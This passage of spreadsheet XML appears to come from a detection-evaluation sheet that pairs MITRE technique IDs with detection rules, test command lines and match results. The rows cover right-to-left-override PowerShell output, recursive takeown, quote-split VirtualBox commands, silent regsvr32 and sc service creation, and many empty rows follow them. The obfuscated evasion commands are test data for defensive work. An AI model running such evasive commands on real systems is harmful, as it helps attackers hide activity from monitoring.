          <t>proc_creation_win_susp_right_to_left_override</t>
        </is>
      </c>
      <c r="C4187" s="44" t="inlineStr">
        <is>
          <t>Potential Defense Evasion Via Right-to-Left Override</t>
        </is>
      </c>
      <c r="D4187" s="44" t="inlineStr">
        <is>
          <t>ad691d92-15f2-4181-9aa4-723c74f9ddc3</t>
        </is>
      </c>
      <c r="E4187" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Output ('TEST-HOST ' + [char]0x202E)"</t>
        </is>
      </c>
      <c r="F4187" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4187" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4187" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4187" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR (e312efd0-35a1-407f-8439-b8d434b438a6); Potential PowerShell Obfuscation Via WCHAR/CHAR (e312efd0-35a1-407f-8439-b8d434b438a6)</t>
        </is>
      </c>
      <c r="J4187" s="44" t="n"/>
      <c r="K4187" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4188" ht="15.75" customHeight="1" s="42">
      <c r="A4188" s="44" t="inlineStr">
        <is>
          <t>t1036.002</t>
        </is>
      </c>
      <c r="B4188" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_right_to_left_override</t>
        </is>
      </c>
      <c r="C4188" s="44" t="inlineStr">
        <is>
          <t>Potential Defense Evasion Via Right-to-Left Override</t>
        </is>
      </c>
      <c r="D4188" s="44" t="inlineStr">
        <is>
          <t>ad691d92-15f2-4181-9aa4-723c74f9ddc3</t>
        </is>
      </c>
      <c r="E4188" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$rtlo = [regex]::Unescape('\u202e'); Write-Output \"TEST-HOST $rtlo\""</t>
        </is>
      </c>
      <c r="F4188" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4188" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4188" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4188" s="44" t="n"/>
      <c r="J4188" s="44" t="n"/>
      <c r="K4188" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4189" ht="15.75" customHeight="1" s="42">
      <c r="A4189" s="44" t="inlineStr">
        <is>
          <t>t1222.001</t>
        </is>
      </c>
      <c r="B4189" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_takeown_recursive_own</t>
        </is>
      </c>
      <c r="C4189" s="44" t="inlineStr">
        <is>
          <t>Suspicious Recursive Takeown</t>
        </is>
      </c>
      <c r="D4189" s="44" t="inlineStr">
        <is>
          <t>554601fb-9b71-4bcc-abf4-21a611be4fde</t>
        </is>
      </c>
      <c r="E4189" s="44" t="inlineStr">
        <is>
          <t>takeown.exe /f"C:\Users\thaim\AppData\Local\Temp\T1222.001_takeown_folder" /r</t>
        </is>
      </c>
      <c r="F4189" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4189" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4189" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4189" s="44" t="n"/>
      <c r="J4189" s="44" t="n"/>
      <c r="K4189" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4190" ht="15.75" customHeight="1" s="42">
      <c r="A4190" s="44" t="inlineStr">
        <is>
          <t>t1222.001</t>
        </is>
      </c>
      <c r="B4190" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_takeown_recursive_own</t>
        </is>
      </c>
      <c r="C4190" s="44" t="inlineStr">
        <is>
          <t>Suspicious Recursive Takeown</t>
        </is>
      </c>
      <c r="D4190" s="44" t="inlineStr">
        <is>
          <t>554601fb-9b71-4bcc-abf4-21a611be4fde</t>
        </is>
      </c>
      <c r="E4190" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c takeown.exe /f C:\Users\thaim\AppData\Local\Temp\T1222.001_takeown_folder /^r</t>
        </is>
      </c>
      <c r="F4190" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4190" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4190" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4190" s="44" t="inlineStr">
        <is>
          <t>Suspicious Recursive Takeown (554601fb-9b71-4bcc-abf4-21a611be4fde)</t>
        </is>
      </c>
      <c r="J4190" s="44" t="n"/>
      <c r="K4190" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4191" ht="15.75" customHeight="1" s="42">
      <c r="A4191" s="44" t="inlineStr">
        <is>
          <t>t1564.006</t>
        </is>
      </c>
      <c r="B4191" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_virtualbox_execution</t>
        </is>
      </c>
      <c r="C4191" s="44" t="inlineStr">
        <is>
          <t>Virtualbox Driver Installation or Starting of VMs</t>
        </is>
      </c>
      <c r="D4191" s="44" t="inlineStr">
        <is>
          <t>bab049ca-7471-4828-9024-38279a4c04da</t>
        </is>
      </c>
      <c r="E4191" s="44" t="inlineStr">
        <is>
          <t>"C:\Program Files\Oracle\VirtualBox\VBoxManage.exe" "s""t""a""r""t""v""m" "Atomic VM"</t>
        </is>
      </c>
      <c r="F4191" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4191" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4191" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4191" s="44" t="n"/>
      <c r="J4191" s="44" t="n"/>
      <c r="K4191" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4192" ht="15.75" customHeight="1" s="42">
      <c r="A4192" s="44" t="inlineStr">
        <is>
          <t>t1564.006</t>
        </is>
      </c>
      <c r="B4192" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_virtualbox_execution</t>
        </is>
      </c>
      <c r="C4192" s="44" t="inlineStr">
        <is>
          <t>Virtualbox Driver Installation or Starting of VMs</t>
        </is>
      </c>
      <c r="D4192" s="44" t="inlineStr">
        <is>
          <t>bab049ca-7471-4828-9024-38279a4c04da</t>
        </is>
      </c>
      <c r="E4192" s="44" t="inlineStr">
        <is>
          <t>regsvr32 /S "C:\Program Files\Oracle\VirtualBox\.\VboxC.dll"</t>
        </is>
      </c>
      <c r="F4192" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4192" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4192" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4192" s="44" t="inlineStr">
        <is>
          <t>Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22); Virtualbox Driver Installation or Starting of VMs (bab049ca-7471-4828-9024-38279a4c04da); Virtualbox Driver Installation or Starting of VMs (bab049ca-7471-4828-9024-38279a4c04da)</t>
        </is>
      </c>
      <c r="J4192" s="44" t="n"/>
      <c r="K4192" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4193" ht="15.75" customHeight="1" s="42">
      <c r="A4193" s="44" t="inlineStr">
        <is>
          <t>t1564.006</t>
        </is>
      </c>
      <c r="B4193" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_virtualbox_execution</t>
        </is>
      </c>
      <c r="C4193" s="44" t="inlineStr">
        <is>
          <t>Virtualbox Driver Installation or Starting of VMs</t>
        </is>
      </c>
      <c r="D4193" s="44" t="inlineStr">
        <is>
          <t>bab049ca-7471-4828-9024-38279a4c04da</t>
        </is>
      </c>
      <c r="E4193" s="44" t="inlineStr">
        <is>
          <t>sc create VBoxDRV binpath= "C:\Program Files\Oracle\VirtualBox\drivers\VboxDrv.sy""s"</t>
        </is>
      </c>
      <c r="F4193" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4193" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4193" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4193" s="44" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE (85ff530b-261d-48c6-a441-facaa2e81e48)</t>
        </is>
      </c>
      <c r="J4193" s="44" t="n"/>
      <c r="K4193" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4194" ht="15.75" customHeight="1" s="42"/>
    <row r="4195" ht="15.75" customHeight="1" s="42"/>
    <row r="4196" ht="15.75" customHeight="1" s="42"/>
    <row r="4197" ht="15.75" customHeight="1" s="42"/>
    <row r="4198" ht="15.75" customHeight="1" s="42"/>
    <row r="4199" ht="15.75" customHeight="1" s="42"/>
    <row r="4200" ht="15.75" customHeight="1" s="42"/>
    <row r="4201" ht="15.75" customHeight="1" s="42"/>
    <row r="4202" ht="15.75" customHeight="1" s="42"/>
    <row r="4203" ht="15.75" customHeight="1" s="42"/>
    <row r="4204" ht="15.75" customHeight="1" s="42"/>
    <row r="4205" ht="15.75" customHeight="1" s="42"/>
    <row r="4206" ht="15.75" customHeight="1" s="42"/>
    <row r="4207" ht="15.75" customHeight="1" s="42"/>
    <row r="4208" ht="15.75" customHeight="1" s="42"/>
    <row r="4209" ht="15.75" customHeight="1" s="42"/>
    <row r="4210" ht="15.75" customHeight="1" s="42"/>
    <row r="4211" ht="15.75" customHeight="1" s="42"/>
    <row r="4212" ht="15.75" customHeight="1" s="42"/>
    <row r="4213" ht="15.75" customHeight="1" s="42"/>
    <row r="4214" ht="15.75" customHeight="1" s="42"/>
    <row r="4215" ht="15.75" customHeight="1" s="42"/>
    <row r="4216" ht="15.75" customHeight="1" s="42"/>
    <row r="4217" ht="15.75" customHeight="1" s="42"/>
    <row r="4218" ht="15.75" customHeight="1" s="42"/>
    <row r="4219" ht="15.75" customHeight="1" s="42"/>
    <row r="4220" ht="15.75" customHeight="1" s="42"/>
    <row r="4221" ht="15.75" customHeight="1" s="42"/>
    <row r="4222" ht="15.75" customHeight="1" s="42"/>
    <row r="4223" ht="15.75" customHeight="1" s="42"/>
    <row r="4224" ht="15.75" customHeight="1" s="42"/>
    <row r="4225" ht="15.75" customHeight="1" s="42"/>
    <row r="4226" ht="15.75" customHeight="1" s="42"/>
    <row r="4227" ht="15.75" customHeight="1" s="42"/>
    <row r="4228" ht="15.75" customHeight="1" s="42"/>
    <row r="4229" ht="15.75" customHeight="1" s="42"/>
    <row r="4230" ht="15.75" customHeight="1" s="42"/>
    <row r="4231" ht="15.75" customHeight="1" s="42"/>
    <row r="4232" ht="15.75" customHeight="1" s="42"/>
    <row r="4233" ht="15.75" customHeight="1" s="42"/>
    <row r="4234" ht="15.75" customHeight="1" s="42"/>
    <row r="4235" ht="15.75" customHeight="1" s="42"/>
    <row r="4236" ht="15.75" customHeight="1" s="42"/>
    <row r="4237" ht="15.75" customHeight="1" s="42"/>
    <row r="4238" ht="15.75" customHeight="1" s="42"/>
    <row r="4239" ht="15.75" customHeight="1" s="42"/>
    <row r="4240" ht="15.75" customHeight="1" s="42"/>
    <row r="4241" ht="15.75" customHeight="1" s="42"/>
    <row r="4242" ht="15.75" customHeight="1" s="42"/>
    <row r="4243" ht="15.75" customHeight="1" s="42"/>
    <row r="4244" ht="15.75" customHeight="1" s="42"/>
    <row r="4245" ht="15.75" customHeight="1" s="42"/>
    <row r="4246" ht="15.75" customHeight="1" s="42"/>
    <row r="4247" ht="15.75" customHeight="1" s="42"/>
    <row r="4248" ht="15.75" customHeight="1" s="42"/>
    <row r="4249" ht="15.75" customHeight="1" s="42"/>
    <row r="4250" ht="15.75" customHeight="1" s="42"/>
    <row r="4251" ht="15.75" customHeight="1" s="42"/>
    <row r="4252" ht="15.75" customHeight="1" s="42"/>
    <row r="4253" ht="15.75" customHeight="1" s="42"/>
    <row r="4254" ht="15.75" customHeight="1" s="42"/>
    <row r="4255" ht="15.75" customHeight="1" s="42"/>
    <row r="4256" ht="15.75" customHeight="1" s="42"/>
    <row r="4257" ht="15.75" customHeight="1" s="42"/>
    <row r="4258" ht="15.75" customHeight="1" s="42"/>
    <row r="4259" ht="15.75" customHeight="1" s="42"/>
    <row r="4260" ht="15.75" customHeight="1" s="42"/>
    <row r="4261" ht="15.75" customHeight="1" s="42"/>
    <row r="4262" ht="15.75" customHeight="1" s="42"/>
    <row r="4263" ht="15.75" customHeight="1" s="42"/>
    <row r="4264" ht="15.75" customHeight="1" s="42"/>
    <row r="4265" ht="15.75" customHeight="1" s="42"/>
    <row r="4266" ht="15.75" customHeight="1" s="42"/>
    <row r="4267" ht="15.75" customHeight="1" s="42"/>
    <row r="4268" ht="15.75" customHeight="1" s="42"/>
    <row r="4269" ht="15.75" customHeight="1" s="42"/>
    <row r="4270" ht="15.75" customHeight="1" s="42"/>
    <row r="4271" ht="15.75" customHeight="1" s="42"/>
    <row r="4272" ht="15.75" customHeight="1" s="42"/>
    <row r="4273" ht="15.75" customHeight="1" s="42"/>
    <row r="4274" ht="15.75" customHeight="1" s="42"/>
    <row r="4275" ht="15.75" customHeight="1" s="42"/>
    <row r="4276" ht="15.75" customHeight="1" s="42"/>
    <row r="4277" ht="15.75" customHeight="1" s="42"/>
    <row r="4278" ht="15.75" customHeight="1" s="42"/>
    <row r="4279" ht="15.75" customHeight="1" s="42"/>
    <row r="4280" ht="15.75" customHeight="1" s="42"/>
    <row r="4281" ht="15.75" customHeight="1" s="42"/>
    <row r="4282" ht="15.75" customHeight="1" s="42"/>
    <row r="4283" ht="15.75" customHeight="1" s="42"/>
    <row r="4284" ht="15.75" customHeight="1" s="42"/>
    <row r="4285" ht="15.75" customHeight="1" s="42"/>
    <row r="4286" ht="15.75" customHeight="1" s="42"/>
    <row r="4287" ht="15.75" customHeight="1" s="42"/>
    <row r="4288" ht="15.75" customHeight="1" s="42"/>
    <row r="4289" ht="15.75" customHeight="1" s="42"/>
    <row r="4290" ht="15.75" customHeight="1" s="42"/>
    <row r="4291" ht="15.75" customHeight="1" s="42"/>
    <row r="4292" ht="15.75" customHeight="1" s="42"/>
    <row r="4293" ht="15.75" customHeight="1" s="42"/>
    <row r="4294" ht="15.75" customHeight="1" s="42"/>
    <row r="4295" ht="15.75" customHeight="1" s="42"/>
    <row r="4296" ht="15.75" customHeight="1" s="42"/>
    <row r="4297" ht="15.75" customHeight="1" s="42"/>
    <row r="4298" ht="15.75" customHeight="1" s="42"/>
    <row r="4299" ht="15.75" customHeight="1" s="42"/>
    <row r="4300" ht="15.75" customHeight="1" s="42"/>
    <row r="4301" ht="15.75" customHeight="1" s="42"/>
    <row r="4302" ht="15.75" customHeight="1" s="42"/>
    <row r="4303" ht="15.75" customHeight="1" s="42"/>
    <row r="4304" ht="15.75" customHeight="1" s="42"/>
    <row r="4305" ht="15.75" customHeight="1" s="42"/>
    <row r="4306" ht="15.75" customHeight="1" s="42"/>
    <row r="4307" ht="15.75" customHeight="1" s="42"/>
    <row r="4308" ht="15.75" customHeight="1" s="42"/>
    <row r="4309" ht="15.75" customHeight="1" s="42"/>
    <row r="4310" ht="15.75" customHeight="1" s="42"/>
    <row r="4311" ht="15.75" customHeight="1" s="42"/>
    <row r="4312" ht="15.75" customHeight="1" s="42"/>
    <row r="4313" ht="15.75" customHeight="1" s="42"/>
    <row r="4314" ht="15.75" customHeight="1" s="42"/>
    <row r="4315" ht="15.75" customHeight="1" s="42"/>
    <row r="4316" ht="15.75" customHeight="1" s="42"/>
    <row r="4317" ht="15.75" customHeight="1" s="42"/>
    <row r="4318" ht="15.75" customHeight="1" s="42"/>
    <row r="4319" ht="15.75" customHeight="1" s="42"/>
    <row r="4320" ht="15.75" customHeight="1" s="42"/>
    <row r="4321" ht="15.75" customHeight="1" s="42"/>
    <row r="4322" ht="15.75" customHeight="1" s="42"/>
    <row r="4323" ht="15.75" customHeight="1" s="42"/>
    <row r="4324" ht="15.75" customHeight="1" s="42"/>
    <row r="4325" ht="15.75" customHeight="1" s="42"/>
    <row r="4326" ht="15.75" customHeight="1" s="42"/>
    <row r="4327" ht="15.75" customHeight="1" s="42"/>
    <row r="4328" ht="15.75" customHeight="1" s="42"/>
    <row r="4329" ht="15.75" customHeight="1" s="42"/>
    <row r="4330" ht="15.75" customHeight="1" s="42"/>
    <row r="4331" ht="15.75" customHeight="1" s="42"/>
    <row r="4332" ht="15.75" customHeight="1" s="42"/>
    <row r="4333" ht="15.75" customHeight="1" s="42"/>
    <row r="4334" ht="15.75" customHeight="1" s="42"/>
    <row r="4335" ht="15.75" customHeight="1" s="42"/>
    <row r="4336" ht="15.75" customHeight="1" s="42"/>
    <row r="4337" ht="15.75" customHeight="1" s="42"/>
    <row r="4338" ht="15.75" customHeight="1" s="42"/>
    <row r="4339" ht="15.75" customHeight="1" s="42"/>
    <row r="4340" ht="15.75" customHeight="1" s="42"/>
    <row r="4341" ht="15.75" customHeight="1" s="42"/>
    <row r="4342" ht="15.75" customHeight="1" s="42"/>
    <row r="4343" ht="15.75" customHeight="1" s="42"/>
    <row r="4344" ht="15.75" customHeight="1" s="42"/>
    <row r="4345" ht="15.75" customHeight="1" s="42"/>
    <row r="4346" ht="15.75" customHeight="1" s="42"/>
    <row r="4347" ht="15.75" customHeight="1" s="42"/>
    <row r="4348" ht="15.75" customHeight="1" s="42"/>
    <row r="4349" ht="15.75" customHeight="1" s="42"/>
    <row r="4350" ht="15.75" customHeight="1" s="42"/>
    <row r="4351" ht="15.75" customHeight="1" s="42"/>
    <row r="4352" ht="15.75" customHeight="1" s="42"/>
    <row r="4353" ht="15.75" customHeight="1" s="42"/>
    <row r="4354" ht="15.75" customHeight="1" s="42"/>
    <row r="4355" ht="15.75" customHeight="1" s="42"/>
    <row r="4356" ht="15.75" customHeight="1" s="42"/>
    <row r="4357" ht="15.75" customHeight="1" s="42"/>
    <row r="4358" ht="15.75" customHeight="1" s="42"/>
    <row r="4359" ht="15.75" customHeight="1" s="42"/>
    <row r="4360" ht="15.75" customHeight="1" s="42"/>
    <row r="4361" ht="15.75" customHeight="1" s="42"/>
    <row r="4362" ht="15.75" customHeight="1" s="42"/>
    <row r="4363" ht="15.75" customHeight="1" s="42"/>
    <row r="4364" ht="15.75" customHeight="1" s="42"/>
    <row r="4365" ht="15.75" customHeight="1" s="42"/>
    <row r="4366" ht="15.75" customHeight="1" s="42"/>
    <row r="4367" ht="15.75" customHeight="1" s="42"/>
    <row r="4368" ht="15.75" customHeight="1" s="42"/>
    <row r="4369" ht="15.75" customHeight="1" s="42"/>
    <row r="4370" ht="15.75" customHeight="1" s="42"/>
    <row r="4371" ht="15.75" customHeight="1" s="42"/>
    <row r="4372" ht="15.75" customHeight="1" s="42"/>
    <row r="4373" ht="15.75" customHeight="1" s="42"/>
    <row r="4374" ht="15.75" customHeight="1" s="42"/>
    <row r="4375" ht="15.75" customHeight="1" s="42"/>
    <row r="4376" ht="15.75" customHeight="1" s="42"/>
    <row r="4377" ht="15.75" customHeight="1" s="42"/>
    <row r="4378" ht="15.75" customHeight="1" s="42"/>
    <row r="4379" ht="15.75" customHeight="1" s="42"/>
    <row r="4380" ht="15.75" customHeight="1" s="42"/>
    <row r="4381" ht="15.75" customHeight="1" s="42"/>
    <row r="4382" ht="15.75" customHeight="1" s="42"/>
    <row r="4383" ht="15.75" customHeight="1" s="42"/>
    <row r="4384" ht="15.75" customHeight="1" s="42"/>
    <row r="4385" ht="15.75" customHeight="1" s="42"/>
    <row r="4386" ht="15.75" customHeight="1" s="42"/>
    <row r="4387" ht="15.75" customHeight="1" s="42"/>
    <row r="4388" ht="15.75" customHeight="1" s="42"/>
    <row r="4389" ht="15.75" customHeight="1" s="42"/>
    <row r="4390" ht="15.75" customHeight="1" s="42"/>
    <row r="4391" ht="15.75" customHeight="1" s="42"/>
    <row r="4392" ht="15.75" customHeight="1" s="42"/>
    <row r="4393" ht="15.75" customHeight="1" s="42"/>
    <row r="4394" ht="15.75" customHeight="1" s="42"/>
    <row r="4395" ht="15.75" customHeight="1" s="42"/>
    <row r="4396" ht="15.75" customHeight="1" s="42"/>
    <row r="4397" ht="15.75" customHeight="1" s="42"/>
    <row r="4398" ht="15.75" customHeight="1" s="42"/>
    <row r="4399" ht="15.75" customHeight="1" s="42"/>
    <row r="4400" ht="15.75" customHeight="1" s="42"/>
    <row r="4401" ht="15.75" customHeight="1" s="42"/>
    <row r="4402" ht="15.75" customHeight="1" s="42"/>
    <row r="4403" ht="15.75" customHeight="1" s="42"/>
    <row r="4404" ht="15.75" customHeight="1" s="42"/>
    <row r="4405" ht="15.75" customHeight="1" s="42"/>
    <row r="4406" ht="15.75" customHeight="1" s="42"/>
    <row r="4407" ht="15.75" customHeight="1" s="42"/>
    <row r="4408" ht="15.75" customHeight="1" s="42"/>
    <row r="4409" ht="15.75" customHeight="1" s="42"/>
    <row r="4410" ht="15.75" customHeight="1" s="42"/>
    <row r="4411" ht="15.75" customHeight="1" s="42"/>
    <row r="4412" ht="15.75" customHeight="1" s="42"/>
    <row r="4413" ht="15.75" customHeight="1" s="42"/>
    <row r="4414" ht="15.75" customHeight="1" s="42"/>
    <row r="4415" ht="15.75" customHeight="1" s="42"/>
    <row r="4416" ht="15.75" customHeight="1" s="42"/>
    <row r="4417" ht="15.75" customHeight="1" s="42"/>
    <row r="4418" ht="15.75" customHeight="1" s="42"/>
    <row r="4419" ht="15.75" customHeight="1" s="42"/>
    <row r="4420" ht="15.75" customHeight="1" s="42"/>
    <row r="4421" ht="15.75" customHeight="1" s="42"/>
    <row r="4422" ht="15.75" customHeight="1" s="42"/>
    <row r="4423" ht="15.75" customHeight="1" s="42"/>
    <row r="4424" ht="15.75" customHeight="1" s="42"/>
    <row r="4425" ht="15.75" customHeight="1" s="42"/>
    <row r="4426" ht="15.75" customHeight="1" s="42"/>
    <row r="4427" ht="15.75" customHeight="1" s="42"/>
    <row r="4428" ht="15.75" customHeight="1" s="42"/>
    <row r="4429" ht="15.75" customHeight="1" s="42"/>
    <row r="4430" ht="15.75" customHeight="1" s="42"/>
    <row r="4431" ht="15.75" customHeight="1" s="42"/>
    <row r="4432" ht="15.75" customHeight="1" s="42"/>
    <row r="4433" ht="15.75" customHeight="1" s="42"/>
    <row r="4434" ht="15.75" customHeight="1" s="42"/>
    <row r="4435" ht="15.75" customHeight="1" s="42"/>
    <row r="4436" ht="15.75" customHeight="1" s="42"/>
    <row r="4437" ht="15.75" customHeight="1" s="42"/>
    <row r="4438" ht="15.75" customHeight="1" s="42"/>
    <row r="4439" ht="15.75" customHeight="1" s="42"/>
    <row r="4440" ht="15.75" customHeight="1" s="42"/>
    <row r="4441" ht="15.75" customHeight="1" s="42"/>
    <row r="4442" ht="15.75" customHeight="1" s="42"/>
    <row r="4443" ht="15.75" customHeight="1" s="42"/>
    <row r="4444" ht="15.75" customHeight="1" s="42"/>
    <row r="4445" ht="15.75" customHeight="1" s="42"/>
    <row r="4446" ht="15.75" customHeight="1" s="42"/>
    <row r="4447" ht="15.75" customHeight="1" s="42"/>
    <row r="4448" ht="15.75" customHeight="1" s="42"/>
    <row r="4449" ht="15.75" customHeight="1" s="42"/>
    <row r="4450" ht="15.75" customHeight="1" s="42"/>
    <row r="4451" ht="15.75" customHeight="1" s="42"/>
    <row r="4452" ht="15.75" customHeight="1" s="42"/>
    <row r="4453" ht="15.75" customHeight="1" s="42"/>
    <row r="4454" ht="15.75" customHeight="1" s="42"/>
    <row r="4455" ht="15.75" customHeight="1" s="42"/>
    <row r="4456" ht="15.75" customHeight="1" s="42"/>
    <row r="4457" ht="15.75" customHeight="1" s="42"/>
    <row r="4458" ht="15.75" customHeight="1" s="42"/>
    <row r="4459" ht="15.75" customHeight="1" s="42"/>
    <row r="4460" ht="15.75" customHeight="1" s="42"/>
    <row r="4461" ht="15.75" customHeight="1" s="42"/>
    <row r="4462" ht="15.75" customHeight="1" s="42"/>
    <row r="4463" ht="15.75" customHeight="1" s="42"/>
    <row r="4464" ht="15.75" customHeight="1" s="42"/>
    <row r="4465" ht="15.75" customHeight="1" s="42"/>
    <row r="4466" ht="15.75" customHeight="1" s="42"/>
    <row r="4467" ht="15.75" customHeight="1" s="42"/>
    <row r="4468" ht="15.75" customHeight="1" s="42"/>
    <row r="4469" ht="15.75" customHeight="1" s="42"/>
    <row r="4470" ht="15.75" customHeight="1" s="42"/>
    <row r="4471" ht="15.75" customHeight="1" s="42"/>
    <row r="4472" ht="15.75" customHeight="1" s="42"/>
    <row r="4473" ht="15.75" customHeight="1" s="42"/>
    <row r="4474" ht="15.75" customHeight="1" s="42"/>
    <row r="4475" ht="15.75" customHeight="1" s="42"/>
    <row r="4476" ht="15.75" customHeight="1" s="42"/>
    <row r="4477" ht="15.75" customHeight="1" s="42"/>
    <row r="4478" ht="15.75" customHeight="1" s="42"/>
    <row r="4479" ht="15.75" customHeight="1" s="42"/>
    <row r="4480" ht="15.75" customHeight="1" s="42"/>
    <row r="4481" ht="15.75" customHeight="1" s="42"/>
    <row r="4482" ht="15.75" customHeight="1" s="42"/>
    <row r="4483" ht="15.75" customHeight="1" s="42"/>
    <row r="4484" ht="15.75" customHeight="1" s="42"/>
    <row r="4485" ht="15.75" customHeight="1" s="42"/>
    <row r="4486" ht="15.75" customHeight="1" s="42"/>
    <row r="4487" ht="15.75" customHeight="1" s="42"/>
    <row r="4488" ht="15.75" customHeight="1" s="42"/>
    <row r="4489" ht="15.75" customHeight="1" s="42"/>
    <row r="4490" ht="15.75" customHeight="1" s="42"/>
    <row r="4491" ht="15.75" customHeight="1" s="42"/>
    <row r="4492" ht="15.75" customHeight="1" s="42"/>
    <row r="4493" ht="15.75" customHeight="1" s="42"/>
    <row r="4494" ht="15.75" customHeight="1" s="42"/>
    <row r="4495" ht="15.75" customHeight="1" s="42"/>
    <row r="4496" ht="15.75" customHeight="1" s="42"/>
    <row r="4497" ht="15.75" customHeight="1" s="42"/>
    <row r="4498" ht="15.75" customHeight="1" s="42"/>
    <row r="4499" ht="15.75" customHeight="1" s="42"/>
    <row r="4500" ht="15.75" customHeight="1" s="42"/>
    <row r="4501" ht="15.75" customHeight="1" s="42"/>
    <row r="4502" ht="15.75" customHeight="1" s="42"/>
    <row r="4503" ht="15.75" customHeight="1" s="42"/>
    <row r="4504" ht="15.75" customHeight="1" s="42"/>
    <row r="4505" ht="15.75" customHeight="1" s="42"/>
    <row r="4506" ht="15.75" customHeight="1" s="42"/>
    <row r="4507" ht="15.75" customHeight="1" s="42"/>
    <row r="4508" ht="15.75" customHeight="1" s="42"/>
    <row r="4509" ht="15.75" customHeight="1" s="42"/>
    <row r="4510" ht="15.75" customHeight="1" s="42"/>
    <row r="4511" ht="15.75" customHeight="1" s="42"/>
    <row r="4512" ht="15.75" customHeight="1" s="42"/>
    <row r="4513" ht="15.75" customHeight="1" s="42"/>
    <row r="4514" ht="15.75" customHeight="1" s="42"/>
    <row r="4515" ht="15.75" customHeight="1" s="42"/>
    <row r="4516" ht="15.75" customHeight="1" s="42"/>
    <row r="4517" ht="15.75" customHeight="1" s="42"/>
    <row r="4518" ht="15.75" customHeight="1" s="42"/>
    <row r="4519" ht="15.75" customHeight="1" s="42"/>
    <row r="4520" ht="15.75" customHeight="1" s="42"/>
    <row r="4521" ht="15.75" customHeight="1" s="42"/>
    <row r="4522" ht="15.75" customHeight="1" s="42"/>
    <row r="4523" ht="15.75" customHeight="1" s="42"/>
    <row r="4524" ht="15.75" customHeight="1" s="42"/>
    <row r="4525" ht="15.75" customHeight="1" s="42"/>
    <row r="4526" ht="15.75" customHeight="1" s="42"/>
    <row r="4527" ht="15.75" customHeight="1" s="42"/>
    <row r="4528" ht="15.75" customHeight="1" s="42"/>
    <row r="4529" ht="15.75" customHeight="1" s="42"/>
    <row r="4530" ht="15.75" customHeight="1" s="42"/>
    <row r="4531" ht="15.75" customHeight="1" s="42"/>
    <row r="4532" ht="15.75" customHeight="1" s="42"/>
    <row r="4533" ht="15.75" customHeight="1" s="42"/>
    <row r="4534" ht="15.75" customHeight="1" s="42"/>
    <row r="4535" ht="15.75" customHeight="1" s="42"/>
    <row r="4536" ht="15.75" customHeight="1" s="42"/>
    <row r="4537" ht="15.75" customHeight="1" s="42"/>
    <row r="4538" ht="15.75" customHeight="1" s="42"/>
    <row r="4539" ht="15.75" customHeight="1" s="42"/>
    <row r="4540" ht="15.75" customHeight="1" s="42"/>
    <row r="4541" ht="15.75" customHeight="1" s="42"/>
    <row r="4542" ht="15.75" customHeight="1" s="42"/>
    <row r="4543" ht="15.75" customHeight="1" s="42"/>
    <row r="4544" ht="15.75" customHeight="1" s="42"/>
    <row r="4545" ht="15.75" customHeight="1" s="42"/>
    <row r="4546" ht="15.75" customHeight="1" s="42"/>
    <row r="4547" ht="15.75" customHeight="1" s="42"/>
    <row r="4548" ht="15.75" customHeight="1" s="42"/>
    <row r="4549" ht="15.75" customHeight="1" s="42"/>
    <row r="4550" ht="15.75" customHeight="1" s="42"/>
    <row r="4551" ht="15.75" customHeight="1" s="42"/>
    <row r="4552" ht="15.75" customHeight="1" s="42"/>
    <row r="4553" ht="15.75" customHeight="1" s="42"/>
    <row r="4554" ht="15.75" customHeight="1" s="42"/>
    <row r="4555" ht="15.75" customHeight="1" s="42"/>
    <row r="4556" ht="15.75" customHeight="1" s="42"/>
    <row r="4557" ht="15.75" customHeight="1" s="42"/>
    <row r="4558" ht="15.75" customHeight="1" s="42"/>
    <row r="4559" ht="15.75" customHeight="1" s="42"/>
    <row r="4560" ht="15.75" customHeight="1" s="42"/>
    <row r="4561" ht="15.75" customHeight="1" s="42"/>
    <row r="4562" ht="15.75" customHeight="1" s="42"/>
    <row r="4563" ht="15.75" customHeight="1" s="42"/>
    <row r="4564" ht="15.75" customHeight="1" s="42"/>
    <row r="4565" ht="15.75" customHeight="1" s="42"/>
    <row r="4566" ht="15.75" customHeight="1" s="42"/>
    <row r="4567" ht="15.75" customHeight="1" s="42"/>
    <row r="4568" ht="15.75" customHeight="1" s="42"/>
    <row r="4569" ht="15.75" customHeight="1" s="42"/>
